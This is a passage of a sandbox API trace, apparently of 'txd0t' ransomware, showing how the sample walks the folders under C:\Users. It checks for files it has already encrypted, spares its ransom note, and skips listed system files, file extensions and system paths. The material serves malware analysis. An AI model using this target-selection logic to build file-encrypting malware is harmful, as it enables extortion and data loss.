dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0129.743] StrCmpW (psz1=".", psz2=".") returned 0 [0129.743] StrCmpW (psz1="..", psz2=".") returned 1 [0129.743] StrCmpW (psz1="..", psz2="..") returned 0 [0129.743] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.743] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.743] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\WlTa", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa") returned="C:\\Users\\FD1HVy\\Videos\\WlTa" [0129.743] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa", psz2="\\", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\" [0129.743] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\!TXDOT_READ_ME!.txt" [0129.743] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.743] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.743] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.743] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.743] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.743] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.743] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.743] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.743] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.743] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.743] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.743] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.744] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.744] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.744] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.744] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.744] StrCmpW (psz1="2oN gpnuW1JXd5I9rz.swf.txd0t", psz2=".") returned 1 [0129.744] StrCmpW (psz1="2oN gpnuW1JXd5I9rz.swf.txd0t", psz2="..") returned 1 [0129.744] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\WlTa", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa") returned="C:\\Users\\FD1HVy\\Videos\\WlTa" [0129.744] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa", psz2="\\", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\" [0129.744] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\", psz2="2oN gpnuW1JXd5I9rz.swf.txd0t", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\2oN gpnuW1JXd5I9rz.swf.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\2oN gpnuW1JXd5I9rz.swf.txd0t" [0129.744] PathFindExtensionW (pszPath="2oN gpnuW1JXd5I9rz.swf.txd0t") returned=".txd0t" [0129.744] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.744] StrCmpW (psz1="2q3Ks4TNs0IQQ.swf.txd0t", psz2=".") returned 1 [0129.744] StrCmpW (psz1="2q3Ks4TNs0IQQ.swf.txd0t", psz2="..") returned 1 [0129.744] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\WlTa", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa") returned="C:\\Users\\FD1HVy\\Videos\\WlTa" [0129.744] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa", psz2="\\", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\" [0129.744] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\", psz2="2q3Ks4TNs0IQQ.swf.txd0t", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\2q3Ks4TNs0IQQ.swf.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\2q3Ks4TNs0IQQ.swf.txd0t" [0129.744] PathFindExtensionW (pszPath="2q3Ks4TNs0IQQ.swf.txd0t") returned=".txd0t" [0129.744] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.744] StrCmpW (psz1="d0y3irQ9gxE8.flv.txd0t", psz2=".") returned 1 [0129.744] StrCmpW (psz1="d0y3irQ9gxE8.flv.txd0t", psz2="..") returned 1 [0129.744] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\WlTa", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa") returned="C:\\Users\\FD1HVy\\Videos\\WlTa" [0129.744] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa", psz2="\\", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\" [0129.744] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\", psz2="d0y3irQ9gxE8.flv.txd0t", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\d0y3irQ9gxE8.flv.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\d0y3irQ9gxE8.flv.txd0t" [0129.744] PathFindExtensionW (pszPath="d0y3irQ9gxE8.flv.txd0t") returned=".txd0t" [0129.744] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.744] StrCmpW (psz1="r47Nb711Z06w9.mp4.txd0t", psz2=".") returned 1 [0129.744] StrCmpW (psz1="r47Nb711Z06w9.mp4.txd0t", psz2="..") returned 1 [0129.744] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\WlTa", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa") returned="C:\\Users\\FD1HVy\\Videos\\WlTa" [0129.744] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa", psz2="\\", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\" [0129.744] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\", psz2="r47Nb711Z06w9.mp4.txd0t", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\r47Nb711Z06w9.mp4.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\r47Nb711Z06w9.mp4.txd0t" [0129.744] PathFindExtensionW (pszPath="r47Nb711Z06w9.mp4.txd0t") returned=".txd0t" [0129.744] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.745] StrCmpW (psz1="Public", psz2=".") returned 1 [0129.745] StrCmpW (psz1="Public", psz2="..") returned 1 [0129.745] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Users", cchMax=1042 | out: psz1="C:\\Users") returned="C:\\Users" [0129.745] StrNCatW (in: psz1="C:\\Users", psz2="\\", cchMax=1042 | out: psz1="C:\\Users\\") returned="C:\\Users\\" [0129.745] StrNCatW (in: psz1="C:\\Users\\", psz2="Public", cchMax=1042 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0129.745] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0129.745] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\*", cchMax=1056 | out: psz1="C:\\Users\\Public\\*") returned="C:\\Users\\Public\\*" [0129.745] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x475e19ed, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475e19ed, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0129.745] StrCmpW (psz1=".", psz2=".") returned 0 [0129.745] StrCmpW (psz1="..", psz2=".") returned 1 [0129.745] StrCmpW (psz1="..", psz2="..") returned 0 [0129.745] StrCmpW (psz1="AccountPictures", psz2=".") returned 1 [0129.745] StrCmpW (psz1="AccountPictures", psz2="..") returned 1 [0129.745] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0129.745] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0129.745] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="AccountPictures", cchMax=1056 | out: psz1="C:\\Users\\Public\\AccountPictures") returned="C:\\Users\\Public\\AccountPictures" [0129.745] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Public\\AccountPictures", cchMax=1088 | out: psz1="C:\\Users\\Public\\AccountPictures") returned="C:\\Users\\Public\\AccountPictures" [0129.745] StrNCatW (in: psz1="C:\\Users\\Public\\AccountPictures", psz2="\\*", cchMax=1088 | out: psz1="C:\\Users\\Public\\AccountPictures\\*") returned="C:\\Users\\Public\\AccountPictures\\*" [0129.745] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\AccountPictures\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x3079b77, ftCreationTime.dwHighDateTime=0x1d1a050, ftLastAccessTime.dwLowDateTime=0xce317778, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2370 [0129.745] StrCmpW (psz1=".", psz2=".") returned 0 [0129.745] StrCmpW (psz1="..", psz2=".") returned 1 [0129.745] StrCmpW (psz1="..", psz2="..") returned 0 [0129.745] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0129.746] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0129.746] StrCmpW (psz1="Desktop", psz2=".") returned 1 [0129.746] StrCmpW (psz1="Desktop", psz2="..") returned 1 [0129.746] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0129.746] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0129.746] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Desktop", cchMax=1056 | out: psz1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0129.746] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Public\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0129.746] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop", psz2="\\*", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\*") returned="C:\\Users\\Public\\Desktop\\*" [0129.746] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe4c3ce2c, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe4c3ce2c, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2370 [0129.746] StrCmpW (psz1=".", psz2=".") returned 0 [0129.746] StrCmpW (psz1="..", psz2=".") returned 1 [0129.746] StrCmpW (psz1="..", psz2="..") returned 0 [0129.746] StrCmpW (psz1="Acrobat Reader DC.lnk", psz2=".") returned 1 [0129.746] StrCmpW (psz1="Acrobat Reader DC.lnk", psz2="..") returned 1 [0129.746] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Public\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0129.746] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\") returned="C:\\Users\\Public\\Desktop\\" [0129.746] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop\\", psz2="Acrobat Reader DC.lnk", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\Acrobat Reader DC.lnk") returned="C:\\Users\\Public\\Desktop\\Acrobat Reader DC.lnk" [0129.746] PathFindExtensionW (pszPath="Acrobat Reader DC.lnk") returned=".lnk" [0129.746] StrCmpW (psz1=".lnk", psz2=".txd0t") returned -1 [0129.746] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="bootsect.bak") returned -1 [0129.746] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="iconcache.db") returned -1 [0129.746] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="thumbs.db") returned -1 [0129.746] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2=" ransomware ") returned 1 [0129.746] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2=" ransom ") returned 1 [0129.746] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="debug.txt") returned -1 [0129.746] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="boot.ini") returned -1 [0129.746] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="desktop.ini") returned -1 [0129.746] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="autorun.inf") returned -1 [0129.747] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="ntuser.dat") returned -1 [0129.747] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="ntldr") returned -1 [0129.747] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="ntdetect.com") returned -1 [0129.747] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="bootfont.bin") returned -1 [0129.747] StrCmpIW (psz1="Acrobat Reader DC.lnk", psz2="!TXDOT_READ_ME!.txt") returned 1 [0129.747] PathFindExtensionW (pszPath="Acrobat Reader DC.lnk") returned=".lnk" [0129.747] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".lnk") returned=".lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0129.747] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa08e58, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0129.747] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0129.747] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0129.747] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4c3ce2c, ftCreationTime.dwHighDateTime=0x1d327cb, ftLastAccessTime.dwLowDateTime=0xe4c3ce2c, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe4c6308a, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x91a, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="Google Chrome.lnk", cAlternateFileName="GOOGLE~1.LNK")) returned 1 [0129.747] StrCmpW (psz1="Google Chrome.lnk", psz2=".") returned 1 [0129.747] StrCmpW (psz1="Google Chrome.lnk", psz2="..") returned 1 [0129.747] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Public\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0129.747] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\") returned="C:\\Users\\Public\\Desktop\\" [0129.747] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop\\", psz2="Google Chrome.lnk", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\Google Chrome.lnk") returned="C:\\Users\\Public\\Desktop\\Google Chrome.lnk" [0129.747] PathFindExtensionW (pszPath="Google Chrome.lnk") returned=".lnk" [0129.747] StrCmpW (psz1=".lnk", psz2=".txd0t") returned -1 [0129.747] StrCmpIW (psz1="Google Chrome.lnk", psz2="bootsect.bak") returned 1 [0129.747] StrCmpIW (psz1="Google Chrome.lnk", psz2="iconcache.db") returned -1 [0129.747] StrCmpIW (psz1="Google Chrome.lnk", psz2="thumbs.db") returned -1 [0129.747] StrCmpIW (psz1="Google Chrome.lnk", psz2=" ransomware ") returned 1 [0129.747] StrCmpIW (psz1="Google Chrome.lnk", psz2=" ransom ") returned 1 [0129.747] StrCmpIW (psz1="Google Chrome.lnk", psz2="debug.txt") returned 1 [0129.747] StrCmpIW (psz1="Google Chrome.lnk", psz2="boot.ini") returned 1 [0129.747] StrCmpIW (psz1="Google Chrome.lnk", psz2="desktop.ini") returned 1 [0129.747] StrCmpIW (psz1="Google Chrome.lnk", psz2="autorun.inf") returned 1 [0129.747] StrCmpIW (psz1="Google Chrome.lnk", psz2="ntuser.dat") returned -1 [0129.747] StrCmpIW (psz1="Google Chrome.lnk", psz2="ntldr") returned -1 [0129.747] StrCmpIW (psz1="Google Chrome.lnk", psz2="ntdetect.com") returned -1 [0129.747] StrCmpIW (psz1="Google Chrome.lnk", psz2="bootfont.bin") returned 1 [0129.747] StrCmpIW (psz1="Google Chrome.lnk", psz2="!TXDOT_READ_ME!.txt") returned 1 [0129.747] PathFindExtensionW (pszPath="Google Chrome.lnk") returned=".lnk" [0129.747] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".lnk") returned=".lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0129.747] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef84fc3f, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xef84fc3f, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xef84fc3f, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x3e7, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 1 [0129.748] StrCmpW (psz1="Mozilla Firefox.lnk", psz2=".") returned 1 [0129.748] StrCmpW (psz1="Mozilla Firefox.lnk", psz2="..") returned 1 [0129.748] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Public\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0129.748] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\") returned="C:\\Users\\Public\\Desktop\\" [0129.748] StrNCatW (in: psz1="C:\\Users\\Public\\Desktop\\", psz2="Mozilla Firefox.lnk", cchMax=1072 | out: psz1="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" [0129.748] PathFindExtensionW (pszPath="Mozilla Firefox.lnk") returned=".lnk" [0129.748] StrCmpW (psz1=".lnk", psz2=".txd0t") returned -1 [0129.748] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="bootsect.bak") returned 1 [0129.748] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="iconcache.db") returned 1 [0129.748] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="thumbs.db") returned -1 [0129.748] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2=" ransomware ") returned 1 [0129.748] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2=" ransom ") returned 1 [0129.748] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="debug.txt") returned 1 [0129.748] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="boot.ini") returned 1 [0129.748] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="desktop.ini") returned 1 [0129.748] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="autorun.inf") returned 1 [0129.748] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="ntuser.dat") returned -1 [0129.748] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="ntldr") returned -1 [0129.748] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="ntdetect.com") returned -1 [0129.748] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="bootfont.bin") returned 1 [0129.748] StrCmpIW (psz1="Mozilla Firefox.lnk", psz2="!TXDOT_READ_ME!.txt") returned 1 [0129.748] PathFindExtensionW (pszPath="Mozilla Firefox.lnk") returned=".lnk" [0129.748] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".lnk") returned=".lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0129.748] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef84fc3f, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xef84fc3f, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xef84fc3f, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x3e7, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 0 [0129.748] FindClose (in: hFindFile=0xec2370 | out: hFindFile=0xec2370) returned 1 [0129.797] GetProcessHeap () returned 0xe30000 [0129.797] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0129.798] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa08e58, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0129.798] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0129.798] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0129.798] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb1fb672c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0129.798] StrCmpW (psz1="Documents", psz2=".") returned 1 [0129.798] StrCmpW (psz1="Documents", psz2="..") returned 1 [0129.798] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0129.798] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0129.798] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Documents", cchMax=1056 | out: psz1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0129.798] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\windows\\system32\\") returned 0x0 [0129.798] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.798] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\windows\\system\\") returned 0x0 [0129.798] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.798] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.798] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\appdata\\local\\") returned 0x0 [0129.798] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.798] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.798] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.798] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\boot\\") returned 0x0 [0129.798] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\perflogs\\") returned 0x0 [0129.798] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\programdata\\") returned 0x0 [0129.798] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\drivers\\") returned 0x0 [0129.798] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\wsus\\") returned 0x0 [0129.798] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.798] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.798] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="crypt_detect") returned 0x0 [0129.798] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="cryptolocker") returned 0x0 [0129.798] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="ransomware") 